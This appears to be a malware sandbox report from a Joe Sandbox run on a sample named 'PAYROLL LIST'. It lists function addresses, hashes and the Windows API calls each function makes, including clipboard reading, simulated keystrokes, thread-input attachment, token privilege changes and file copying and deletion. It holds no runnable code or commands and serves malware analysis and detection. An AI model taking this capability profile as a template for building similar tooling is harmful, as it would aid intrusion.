Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d9ed30ddfc5d5ad20055ae22209316485813039bda6d82626dbc3344ff9469d7
Instruction ID: 9c7146e77e805fd399d60247d53b9f435c60cc383c3878fe6ff256160cf5f394
Opcode Fuzzy Hash: d9ed30ddfc5d5ad20055ae22209316485813039bda6d82626dbc3344ff9469d7
Instruction Fuzzy Hash: AC2123705086018FDB24DF68C554F1ABBF1BF89344F144968F99A4B662C732E846CF92

Function 00A4AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00A4AFC0

Part of subcall function 00A47BDA: __getptd_noexit.LIBCMT ref: 00A47BDA

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 742cdfda48b95d29d54b70de6ac51d39084db0ee7459bfb09d787a2cd125ba20
Instruction ID: 89e71af1d496c5d71d99da6d78564b327d6827190561d81b672f7211143202e6
Opcode Fuzzy Hash: 742cdfda48b95d29d54b70de6ac51d39084db0ee7459bfb09d787a2cd125ba20
Instruction Fuzzy Hash: 1511B27A8146809FD712AFA4C98276D3660AFC2332F154640E4314F1E2C7B4CD018BB2

Function 00A239DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction ID: ea5f3e120dfd060455058fef56bd1dbc8f0858e904e41ca8ce5f062c856c035e
Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction Fuzzy Hash: DA01A43250011DEFCF04EFA8D9828FEBBB4EF25344F008039B562971A5EA309A49CF60

Function 00A42AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00A42AED

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 33cc503684bdc19bd11090268a9279e8c3c86398356b94f1b373cd2142590de3
Instruction ID: a6284ad5d7b29631b8c39cce337a0c4fc1c82068d78b454b0e9058da4f84c734
Opcode Fuzzy Hash: 33cc503684bdc19bd11090268a9279e8c3c86398356b94f1b373cd2142590de3
Instruction Fuzzy Hash: BAF0F039980205EBEF21AFB48E063DF3AA1BFC0360F548425F8109B191C7788A52DB52

Function 00A24252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,00A239FE,?,00000001), ref: 00A24286

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: e5ef9724c8dfe056e48bad054b2fce8bb33e8d517352aca6503885620bd90a3b
Instruction ID: 004a9f3dc160bf1165c8b30d83c784a298d132b2fd8de650622aa04ee30add2f
Opcode Fuzzy Hash: e5ef9724c8dfe056e48bad054b2fce8bb33e8d517352aca6503885620bd90a3b
Instruction Fuzzy Hash: F5F039B1505722CFCB349F6AE8908A6BBF4FF183253248A3EF1D682610C7729840DF50

Function 00A240A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A240C6

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: ab19518b6cd24d2650d34b4f6b374c720307cf96d776c8354626fc9ee2561f48
Instruction ID: 18c691661ceb592af2589354ad1ef5dd0756210776d39ec1e38a77209049913f
Opcode Fuzzy Hash: ab19518b6cd24d2650d34b4f6b374c720307cf96d776c8354626fc9ee2561f48
Instruction Fuzzy Hash: B9E0C236A002245BCB11E698DC46FEA77ADDFCC6A0F0901B6F909E7244DAA4A9818690

Function 00BA8E5C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00BA8E71

Memory Dump Source

Source File: 00000000.00000002.2134012780.0000000000BA6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba6000_PAYROLL LIST.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: d4f66424d2a96570f5dc5302cde766f7e257ea7f6b4907a80f9bc4fcdcaba176
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: A7E0BF7594410DEFDB00EFA4D5496DE7BB4EF05301F1006A1FD05D7680DB309E548A62

Function 00BA8E60 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00BA8E71

Memory Dump Source

Source File: 00000000.00000002.2134012780.0000000000BA6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba6000_PAYROLL LIST.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: bd2d8d04f17e4dddaa5a18d2d0bc5a47553b8d6f03df90100b4cebf5e514b64f
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 99E0E67594410DDFDB00EFB4D54969E7FF4EF04301F1002A1FD01D2280DA309D508A62

Non-executed Functions

Function 00A8F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A3B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00A8F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A8F8DC
GetWindowLongW.USER32(?,000000F0), ref: 00A8F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A8F940
SendMessageW.USER32 ref: 00A8F966
_wcsncpy.LIBCMT ref: 00A8F9D2
GetKeyState.USER32(00000011), ref: 00A8F9F3
GetKeyState.USER32(00000009), ref: 00A8FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A8FA16
GetKeyState.USER32(00000010), ref: 00A8FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A8FA4F
SendMessageW.USER32 ref: 00A8FA72
SendMessageW.USER32(?,00001030,?,00A8E059), ref: 00A8FB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00A8FB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A8FB96
SetCapture.USER32(?), ref: 00A8FB9F
ClientToScreen.USER32(?,?), ref: 00A8FC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A8FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00A8FC29
ReleaseCapture.USER32 ref: 00A8FC34
GetCursorPos.USER32(?), ref: 00A8FC69
ScreenToClient.USER32(?,?), ref: 00A8FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A8FCD8
SendMessageW.USER32 ref: 00A8FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A8FD41
SendMessageW.USER32 ref: 00A8FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A8FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A8FD8F
GetCursorPos.USER32(?), ref: 00A8FDB0
ScreenToClient.USER32(?,?), ref: 00A8FDBD
GetParent.USER32(?), ref: 00A8FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A8FE3F
SendMessageW.USER32 ref: 00A8FE6F
ClientToScreen.USER32(?,?), ref: 00A8FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A8FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A8FF19
SendMessageW.USER32 ref: 00A8FF3C
ClientToScreen.USER32(?,?), ref: 00A8FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A8FFB6
GetWindowLongW.USER32(?,000000F0), ref: 00A9004B

Strings

F, xrefs: 00A8FF42
@GUI_DRAGID, xrefs: 00A8FBCC

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: edbcd6b44b67c7d2414e572088948164914b517ca92ece7d33595eeaa175247c
Instruction ID: 86163e540baff89319aab48f05f4887baff33abccf758bc645f2c400043f4b6e
Opcode Fuzzy Hash: edbcd6b44b67c7d2414e572088948164914b517ca92ece7d33595eeaa175247c
Instruction Fuzzy Hash: B932CC70604346EFDB20EFA8C884BAABBE9FF49354F140A29F695872A1D731DC51CB51

Function 00A8AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00A8B1CD

Strings

%d/%02d/%02d, xrefs: 00A8AEFC

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: a3dc504e30419b355db01f13b6e21c1ee2c21155c8c1fdfbae8ea81b3c2bdf54
Instruction ID: adecf2a81340a4bb0814a3e6d0745a171cba1f19e7c68c8b172b2c7caecfdc7b
Opcode Fuzzy Hash: a3dc504e30419b355db01f13b6e21c1ee2c21155c8c1fdfbae8ea81b3c2bdf54
Instruction Fuzzy Hash: 7512F171510219AFEB24AF68CC49FAE7BB8FF45710F14421AF91ADB2D1DB709942CB21

Function 00A3EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 00A3EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A93AEA
IsIconic.USER32(000000FF), ref: 00A93AF3
ShowWindow.USER32(000000FF,00000009), ref: 00A93B00
SetForegroundWindow.USER32(000000FF), ref: 00A93B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A93B20
GetCurrentThreadId.KERNEL32 ref: 00A93B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00A93B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00A93B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00A93B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00A93B54
SetForegroundWindow.USER32(000000FF), ref: 00A93B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A93B6C
keybd_event.USER32(00000012,00000000), ref: 00A93B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A93B81
keybd_event.USER32(00000012,00000000), ref: 00A93B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A93B8F
keybd_event.USER32(00000012,00000000), ref: 00A93B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A93B9E
keybd_event.USER32(00000012,00000000), ref: 00A93BA3
SetForegroundWindow.USER32(000000FF), ref: 00A93BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00A93BCD

Strings

Shell_TrayWnd, xrefs: 00A93AE5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 985e30229ed34411277b8bee7585e98e6d85fd941d59521c119c2900ac105c9a
Instruction ID: 445a59ce676c07a250425df10614e3ef7a51a0d8be5a8d388a0d60d1e4e6149c
Opcode Fuzzy Hash: 985e30229ed34411277b8bee7585e98e6d85fd941d59521c119c2900ac105c9a
Instruction Fuzzy Hash: 3A319472B402197BEF21ABA58C49F7F7EBCEB45B50F104015FA46EA1D0D7B15D01AAA0

Function 00A5ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 00A5B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5B180
Part of subcall function 00A5B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A5B1AD
Part of subcall function 00A5B134: GetLastError.KERNEL32 ref: 00A5B1BA

_memset.LIBCMT ref: 00A5AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00A5AD5A
CloseHandle.KERNEL32(?), ref: 00A5AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A5AD82
GetProcessWindowStation.USER32 ref: 00A5AD9B
SetProcessWindowStation.USER32(00000000), ref: 00A5ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A5ADBF

Part of subcall function 00A5AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A5ACC0), ref: 00A5AB99
Part of subcall function 00A5AB84: CloseHandle.KERNEL32(?,?,00A5ACC0), ref: 00A5ABAB

Strings

, xrefs: 00A5AD17
winsta0, xrefs: 00A5AD7D
default, xrefs: 00A5ADBA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 0e24e045eeb6dd51eae6fc7639df0d899193d0d28ce3715c9448f69bda839587
Instruction ID: 40652e2394bd31cbad4853c113a5f917c60c4e394ca18ed2667a8407fe9a3948
Opcode Fuzzy Hash: 0e24e045eeb6dd51eae6fc7639df0d899193d0d28ce3715c9448f69bda839587
Instruction Fuzzy Hash: 5981ADB1A00209AFDF11DFA4DD45AEE7BB8FF28305F044219FD15A61A1D7318E4ADB61

Function 00A660DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A66EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A65FA6,?), ref: 00A66ED8

Part of subcall function 00A66EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A65FA6,?), ref: 00A66EF1

Part of subcall function 00A6725E: __wsplitpath.LIBCMT ref: 00A6727B
Part of subcall function 00A6725E: __wsplitpath.LIBCMT ref: 00A6728E

Part of subcall function 00A672CB: GetFileAttributesW.KERNEL32(?,00A66019), ref: 00A672CC

_wcscat.LIBCMT ref: 00A66149
_wcscat.LIBCMT ref: 00A66167
__wsplitpath.LIBCMT ref: 00A6618E
FindFirstFileW.KERNEL32(?,?), ref: 00A661A4
_wcscpy.LIBCMT ref: 00A66209
_wcscat.LIBCMT ref: 00A6621C
_wcscat.LIBCMT ref: 00A6622F
lstrcmpiW.KERNEL32(?,?), ref: 00A6625D
DeleteFileW.KERNEL32(?), ref: 00A6626E
MoveFileW.KERNEL32(?,?), ref: 00A66289
MoveFileW.KERNEL32(?,?), ref: 00A66298
CopyFileW.KERNEL32(?,?,00000000), ref: 00A662AD
DeleteFileW.KERNEL32(?), ref: 00A662BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A662E1
FindClose.KERNEL32(00000000), ref: 00A662FD
FindClose.KERNEL32(00000000), ref: 00A6630B

Strings

\*.*, xrefs: 00A66138, 00A66147, 00A66165
p1#v`K$v, xrefs: 00A661BA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*$p1#v`K$v
API String ID: 1917200108-1732502266
Opcode ID: ac4d90e02d6a87b8da6dd301f8e123f3abf6b62384d3685e8fbd40adc1fc5ae0
Instruction ID: 26479124a9b2eca4e7c1193b49c249fb03c0cc3e594e35c31c00a6df3ef7dce9
Opcode Fuzzy Hash: ac4d90e02d6a87b8da6dd301f8e123f3abf6b62384d3685e8fbd40adc1fc5ae0
Instruction Fuzzy Hash: FC510FB2D0811CAACB21EBA1CD55DDF77BCAF05304F0501E6E585E3141EB769B898FA4

Function 00A76B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00ABDC00), ref: 00A76B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00A76B44
GetClipboardData.USER32(0000000D), ref: 00A76B4C
CloseClipboard.USER32 ref: 00A76B58
GlobalLock.KERNEL32(00000000), ref: 00A76B74
CloseClipboard.USER32 ref: 00A76B7E
GlobalUnlock.KERNEL32(00000000), ref: 00A76B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00A76BA0
GetClipboardData.USER32(00000001), ref: 00A76BA8
GlobalLock.KERNEL32(00000000), ref: 00A76BB5
GlobalUnlock.KERNEL32(00000000), ref: 00A76BE9
CloseClipboard.USER32 ref: 00A76CF6

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: f00d05325191b1364512595f14144ad64123ee1a3f0f6cb96aacf0e5366f897a
Instruction ID: 525c819f658c6e92510d448eea8986ccee02fe29471d0a8dcc1db87190a7bea9
Opcode Fuzzy Hash: f00d05325191b1364512595f14144ad64123ee1a3f0f6cb96aacf0e5366f897a
Instruction Fuzzy Hash: C0519131244602ABD301EFA4DE46FAE77A8EF89B11F008429F58AD61D1DF70D906CB62

Function 00A6F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A6F62B
FindClose.KERNEL32(00000000), ref: 00A6F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A6F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A6F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 00A6F6E2
__swprintf.LIBCMT ref: 00A6F72E
__swprintf.LIBCMT ref: 00A6F767
__swprintf.LIBCMT ref: 00A6F7BB

Part of subcall function 00A4172B: __woutput_l.LIBCMT ref: 00A41784

__swprintf.LIBCMT ref: 00A6F809
__swprintf.LIBCMT ref: 00A6F858
__swprintf.LIBCMT ref: 00A6F8A7
__swprintf.LIBCMT ref: 00A6F8F6

Strings

%02d, xrefs: 00A6F7B0, 00A6F7B9, 00A6F807, 00A6F856, 00A6F8A5, 00A6F8F4
%4d, xrefs: 00A6F761
%4d%02d%02d%02d%02d%02d, xrefs: 00A6F728

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 8ae8b5fcca2b9a5e4d3a5163b7828d2bdd724ffb4f00809af911c6ae82c25c9e
Instruction ID: a8571121b9cc8943174155ffe983fbeeaa3e08dda8562d9893f68f9c6f2cc757
Opcode Fuzzy Hash: 8ae8b5fcca2b9a5e4d3a5163b7828d2bdd724ffb4f00809af911c6ae82c25c9e
Instruction Fuzzy Hash: EAA101B2408354ABC710EB94D985DAFB7ECAF98704F440D2EF595C3191EB34D949CB62

Function 00A71B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00A71B50
_wcscmp.LIBCMT ref: 00A71B65
_wcscmp.LIBCMT ref: 00A71B7C
GetFileAttributesW.KERNEL32(?), ref: 00A71B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00A71BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00A71BC0
FindClose.KERNEL32(00000000), ref: 00A71BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00A71BE7
_wcscmp.LIBCMT ref: 00A71C0E
_wcscmp.LIBCMT ref: 00A71C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00A71C37
